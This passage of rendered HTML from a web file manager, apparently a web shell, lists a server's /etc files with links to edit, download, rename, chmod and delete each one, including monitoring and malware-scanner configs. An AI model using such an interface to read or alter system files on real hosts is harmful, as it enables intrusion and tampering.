                                <button onclick="ajaxDelete('/etc/issue',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="issue.net">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fissue.net" class="file-link">📄 issue.net</a></td>
                            <td class="size">22 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-05-19 07:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fissue.net" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fissue.net" class="action-button">Download</a>
                                <button onclick="showRename('/etc/issue.net','issue.net')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/issue.net','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/issue.net',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="jwhois.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fjwhois.conf" class="file-link">📄 jwhois.conf</a></td>
                            <td class="size">76.2 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-01-08 11:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fjwhois.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fjwhois.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/jwhois.conf','jwhois.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/jwhois.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/jwhois.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="kdump.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fkdump.conf" class="file-link">📄 kdump.conf</a></td>
                            <td class="size">8.9 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-05-27 09:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fkdump.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fkdump.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/kdump.conf','kdump.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/kdump.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/kdump.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="kill_dbwhitelist">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fkill_dbwhitelist" class="file-link">📄 kill_dbwhitelist</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 08:46</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fkill_dbwhitelist" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fkill_dbwhitelist" class="action-button">Download</a>
                                <button onclick="showRename('/etc/kill_dbwhitelist','kill_dbwhitelist')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/kill_dbwhitelist','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/kill_dbwhitelist',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="kill_whitelist">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fkill_whitelist" class="file-link">📄 kill_whitelist</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0660</span></td>
                            <td>2026-08-20 08:46</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fkill_whitelist" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fkill_whitelist" class="action-button">Download</a>
                                <button onclick="showRename('/etc/kill_whitelist','kill_whitelist')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/kill_whitelist','0660')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/kill_whitelist',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="killwhitelist">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fkillwhitelist" class="file-link">📄 killwhitelist</a></td>
                            <td class="size">13 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-06-18 17:52</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fkillwhitelist" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fkillwhitelist" class="action-button">Download</a>
                                <button onclick="showRename('/etc/killwhitelist','killwhitelist')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/killwhitelist','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/killwhitelist',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="krb5.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fkrb5.conf" class="file-link">📄 krb5.conf</a></td>
                            <td class="size">880 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-05-20 19:50</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fkrb5.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fkrb5.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/krb5.conf','krb5.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/krb5.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/krb5.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="kshrc">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fkshrc" class="file-link">📄 kshrc</a></td>
                            <td class="size">1.1 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-04-08 18:24</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fkshrc" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fkshrc" class="action-button">Download</a>
                                <button onclick="showRename('/etc/kshrc','kshrc')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/kshrc','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/kshrc',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ld.so.cache">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fld.so.cache" class="file-link">📄 ld.so.cache</a></td>
                            <td class="size">41.6 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 03:34</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fld.so.cache" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fld.so.cache" class="action-button">Download</a>
                                <button onclick="showRename('/etc/ld.so.cache','ld.so.cache')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ld.so.cache','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ld.so.cache',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ld.so.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fld.so.conf" class="file-link">📄 ld.so.conf</a></td>
                            <td class="size">28 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-03 10:05</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fld.so.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fld.so.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/ld.so.conf','ld.so.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ld.so.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ld.so.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="lftp.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flftp.conf" class="file-link">📄 lftp.conf</a></td>
                            <td class="size">3.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:09</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flftp.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flftp.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/lftp.conf','lftp.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/lftp.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/lftp.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="lftp.conf.rpmnew">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flftp.conf.rpmnew" class="file-link">📄 lftp.conf.rpmnew</a></td>
                            <td class="size">3.2 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2016-02-20 13:57</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flftp.conf.rpmnew" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flftp.conf.rpmnew" class="action-button">Download</a>
                                <button onclick="showRename('/etc/lftp.conf.rpmnew','lftp.conf.rpmnew')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/lftp.conf.rpmnew','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/lftp.conf.rpmnew',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="libaudit.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flibaudit.conf" class="file-link">📄 libaudit.conf</a></td>
                            <td class="size">191 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-04-04 20:12</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flibaudit.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flibaudit.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/libaudit.conf','libaudit.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/libaudit.conf','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/libaudit.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="libuser.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flibuser.conf" class="file-link">📄 libuser.conf</a></td>
                            <td class="size">2.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2021-03-01 14:32</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flibuser.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flibuser.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/libuser.conf','libuser.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/libuser.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/libuser.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="localaliases">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flocalaliases" class="file-link">📄 localaliases</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-07-24 13:18</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flocalaliases" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flocalaliases" class="action-button">Download</a>
                                <button onclick="showRename('/etc/localaliases','localaliases')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/localaliases','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/localaliases',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="localdomains">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flocaldomains" class="file-link">📄 localdomains</a></td>
                            <td class="size">84.4 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-19 20:31</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flocaldomains" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flocaldomains" class="action-button">Download</a>
                                <button onclick="showRename('/etc/localdomains','localdomains')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/localdomains','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/localdomains',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="localdomains.rpmnew">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flocaldomains.rpmnew" class="file-link">📄 localdomains.rpmnew</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>1998-01-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flocaldomains.rpmnew" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flocaldomains.rpmnew" class="action-button">Download</a>
                                <button onclick="showRename('/etc/localdomains.rpmnew','localdomains.rpmnew')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/localdomains.rpmnew','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/localdomains.rpmnew',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="locale.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flocale.conf" class="file-link">📄 locale.conf</a></td>
                            <td class="size">17 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 14:57</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flocale.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flocale.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/locale.conf','locale.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/locale.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/locale.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="locales.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flocales.conf" class="file-link">📄 locales.conf</a></td>
                            <td class="size">370 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-10-07 15:47</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flocales.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flocales.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/locales.conf','locales.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/locales.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/locales.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="localtime">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flocaltime" class="file-link">📄 localtime</a></td>
                            <td class="size">1.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-06 20:38</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flocaltime" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flocaltime" class="action-button">Download</a>
                                <button onclick="showRename('/etc/localtime','localtime')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/localtime','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/localtime',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="login.defs">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flogin.defs" class="file-link">📄 login.defs</a></td>
                            <td class="size">7.6 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-04-08 18:36</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flogin.defs" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flogin.defs" class="action-button">Download</a>
                                <button onclick="showRename('/etc/login.defs','login.defs')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/login.defs','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/login.defs',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="logrotate.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flogrotate.conf" class="file-link">📄 logrotate.conf</a></td>
                            <td class="size">439 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-07-23 19:25</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flogrotate.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flogrotate.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/logrotate.conf','logrotate.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/logrotate.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/logrotate.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="lynx-site.cfg">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flynx-site.cfg" class="file-link">📄 lynx-site.cfg</a></td>
                            <td class="size">66 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-04-03 14:00</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flynx-site.cfg" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flynx-site.cfg" class="action-button">Download</a>
                                <button onclick="showRename('/etc/lynx-site.cfg','lynx-site.cfg')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/lynx-site.cfg','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/lynx-site.cfg',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="lynx.cfg">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flynx.cfg" class="file-link">📄 lynx.cfg</a></td>
                            <td class="size">158.7 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-04-03 14:00</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flynx.cfg" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flynx.cfg" class="action-button">Download</a>
                                <button onclick="showRename('/etc/lynx.cfg','lynx.cfg')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/lynx.cfg','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/lynx.cfg',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="lynx.lss">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flynx.lss" class="file-link">📄 lynx.lss</a></td>
                            <td class="size">3.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-04-03 14:00</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Flynx.lss" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Flynx.lss" class="action-button">Download</a>
                                <button onclick="showRename('/etc/lynx.lss','lynx.lss')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/lynx.lss','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/lynx.lss',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="machine-id">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmachine-id" class="file-link">📄 machine-id</a></td>
                            <td class="size">33 B</td>
                            <td><span class="permissions">0444</span></td>
                            <td>2025-09-01 14:57</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmachine-id" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmachine-id" class="action-button">Download</a>
                                <button onclick="showRename('/etc/machine-id','machine-id')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/machine-id','0444')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/machine-id',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="magic">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmagic" class="file-link">📄 magic</a></td>
                            <td class="size">111 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-04-05 00:56</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmagic" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmagic" class="action-button">Download</a>
                                <button onclick="showRename('/etc/magic','magic')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/magic','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/magic',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="mailbox_formats">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmailbox_formats" class="file-link">📄 mailbox_formats</a></td>
                            <td class="size">15.1 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmailbox_formats" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmailbox_formats" class="action-button">Download</a>
                                <button onclick="showRename('/etc/mailbox_formats','mailbox_formats')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/mailbox_formats','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/mailbox_formats',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="mailcap">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmailcap" class="file-link">📄 mailcap</a></td>
                            <td class="size">272 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2020-04-22 06:42</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmailcap" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmailcap" class="action-button">Download</a>
                                <button onclick="showRename('/etc/mailcap','mailcap')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/mailcap','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/mailcap',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="mailhelo">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmailhelo" class="file-link">📄 mailhelo</a></td>
                            <td class="size">27 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmailhelo" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmailhelo" class="action-button">Download</a>
                                <button onclick="showRename('/etc/mailhelo','mailhelo')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/mailhelo','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/mailhelo',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="mailips">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmailips" class="file-link">📄 mailips</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmailips" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmailips" class="action-button">Download</a>
                                <button onclick="showRename('/etc/mailips','mailips')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/mailips','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/mailips',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="makedumpfile.conf.sample">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmakedumpfile.conf.sample" class="file-link">📄 makedumpfile.conf.sample</a></td>
                            <td class="size">5.0 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-04-08 18:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmakedumpfile.conf.sample" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmakedumpfile.conf.sample" class="action-button">Download</a>
                                <button onclick="showRename('/etc/makedumpfile.conf.sample','makedumpfile.conf.sample')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/makedumpfile.conf.sample','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/makedumpfile.conf.sample',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="man_db.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fman_db.conf" class="file-link">📄 man_db.conf</a></td>
                            <td class="size">5.1 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-21 12:56</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fman_db.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fman_db.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/man_db.conf','man_db.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/man_db.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/man_db.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="manualmx">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmanualmx" class="file-link">📄 manualmx</a></td>
                            <td class="size">1 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-18 03:56</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmanualmx" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmanualmx" class="action-button">Download</a>
                                <button onclick="showRename('/etc/manualmx','manualmx')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/manualmx','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/manualmx',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="mime.types">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmime.types" class="file-link">📄 mime.types</a></td>
                            <td class="size">65.9 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2020-04-22 06:42</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmime.types" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmime.types" class="action-button">Download</a>
                                <button onclick="showRename('/etc/mime.types','mime.types')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/mime.types','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/mime.types',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="mke2fs.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmke2fs.conf" class="file-link">📄 mke2fs.conf</a></td>
                            <td class="size">1.2 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-21 15:03</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmke2fs.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmke2fs.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/mke2fs.conf','mke2fs.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/mke2fs.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/mke2fs.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="monarx-agent.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmonarx-agent.conf" class="file-link">📄 monarx-agent.conf</a></td>
                            <td class="size">266 B</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-03-20 22:49</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmonarx-agent.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmonarx-agent.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/monarx-agent.conf','monarx-agent.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/monarx-agent.conf','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/monarx-agent.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="monitrc">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmonitrc" class="file-link">📄 monitrc</a></td>
                            <td class="size">12.8 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2025-09-01 15:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmonitrc" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmonitrc" class="action-button">Download</a>
                                <button onclick="showRename('/etc/monitrc','monitrc')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/monitrc','0600')" class="action-button">Chmod</button>
